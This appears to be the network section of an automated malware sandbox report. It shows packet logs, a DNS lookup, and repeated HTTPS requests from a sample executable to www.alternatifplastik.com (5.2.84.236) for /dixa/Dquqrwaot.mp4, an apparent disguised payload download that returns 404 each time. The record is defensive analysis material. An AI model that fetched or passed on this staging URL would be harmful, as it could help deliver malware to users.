                          Mar 7, 2025 15:50:51.712536097 CET443497665.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:51.712610006 CET443497665.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:51.712801933 CET49766443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:51.714065075 CET49766443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:51.715945959 CET49767443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:51.716011047 CET443497675.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:51.716166973 CET49767443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:51.717631102 CET49767443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:51.717655897 CET443497675.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:53.670806885 CET443497675.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:53.673127890 CET49767443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:53.673166037 CET443497675.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:54.506272078 CET443497675.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:54.506350040 CET443497675.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:54.506436110 CET49767443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:54.523890972 CET49767443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:54.525785923 CET49768443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:54.525885105 CET443497685.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:54.525969982 CET49768443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:54.526273966 CET49768443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:54.526305914 CET443497685.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:56.523960114 CET443497685.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:56.526145935 CET49768443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:56.526175976 CET443497685.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:57.289165974 CET443497685.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:57.289236069 CET443497685.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:57.289290905 CET49768443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:57.291454077 CET49768443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:57.294389963 CET49769443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:57.294444084 CET443497695.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:57.294507980 CET49769443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:57.294825077 CET49769443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:57.294841051 CET443497695.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:59.224700928 CET443497695.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:59.226711988 CET49769443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:59.226762056 CET443497695.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:59.969105959 CET443497695.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:59.969189882 CET443497695.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:59.969260931 CET49769443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:59.992106915 CET49769443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:59.992794037 CET49770443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:59.992852926 CET443497705.2.84.236192.168.2.11
                          Mar 7, 2025 15:50:59.992925882 CET49770443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:59.993302107 CET49770443192.168.2.115.2.84.236
                          Mar 7, 2025 15:50:59.993324041 CET443497705.2.84.236192.168.2.11
                          Mar 7, 2025 15:51:01.968033075 CET443497705.2.84.236192.168.2.11
                          Mar 7, 2025 15:51:02.008764029 CET49770443192.168.2.115.2.84.236
                          Mar 7, 2025 15:51:02.317174911 CET49770443192.168.2.115.2.84.236
                          Mar 7, 2025 15:51:02.317197084 CET443497705.2.84.236192.168.2.11
                          Mar 7, 2025 15:51:02.843677998 CET443497705.2.84.236192.168.2.11
                          Mar 7, 2025 15:51:02.875375986 CET443497705.2.84.236192.168.2.11
                          Mar 7, 2025 15:51:02.875962973 CET49770443192.168.2.115.2.84.236
                          Mar 7, 2025 15:51:02.875962973 CET49770443192.168.2.115.2.84.236
                          Mar 7, 2025 15:51:02.876604080 CET49771443192.168.2.115.2.84.236
                          Mar 7, 2025 15:51:02.876641035 CET443497715.2.84.236192.168.2.11
                          Mar 7, 2025 15:51:02.876737118 CET49771443192.168.2.115.2.84.236
                          Mar 7, 2025 15:51:02.876923084 CET49771443192.168.2.115.2.84.236
                          Mar 7, 2025 15:51:02.876931906 CET443497715.2.84.236192.168.2.11
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 7, 2025 15:47:58.025167942 CET6460953192.168.2.111.1.1.1
                          Mar 7, 2025 15:47:58.171588898 CET53646091.1.1.1192.168.2.11
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Mar 7, 2025 15:47:58.025167942 CET192.168.2.111.1.1.10xab39Standard query (0)www.alternatifplastik.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Mar 7, 2025 15:47:58.171588898 CET1.1.1.1192.168.2.110xab39No error (0)www.alternatifplastik.comalternatifplastik.comCNAME (Canonical name)IN (0x0001)false
                          Mar 7, 2025 15:47:58.171588898 CET1.1.1.1192.168.2.110xab39No error (0)alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false
                          • www.alternatifplastik.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.11496995.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:01 UTC218OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          Connection: Keep-Alive
                          2025-03-07 14:48:01 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:47:59 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.11497005.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:03 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:04 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:02 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:04 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.11497015.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:06 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:07 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:05 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:07 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.11497025.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:09 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:10 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:08 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:10 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.11497065.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:12 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:13 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:10 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:13 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.11497085.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:15 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:15 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:13 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:15 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.11497105.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:17 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:18 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:16 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:18 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.11497115.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:20 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:21 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:19 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:21 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.11497125.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:23 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:24 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:22 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:48:24 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.11497135.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:48:26 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:48:27 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:48:24 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
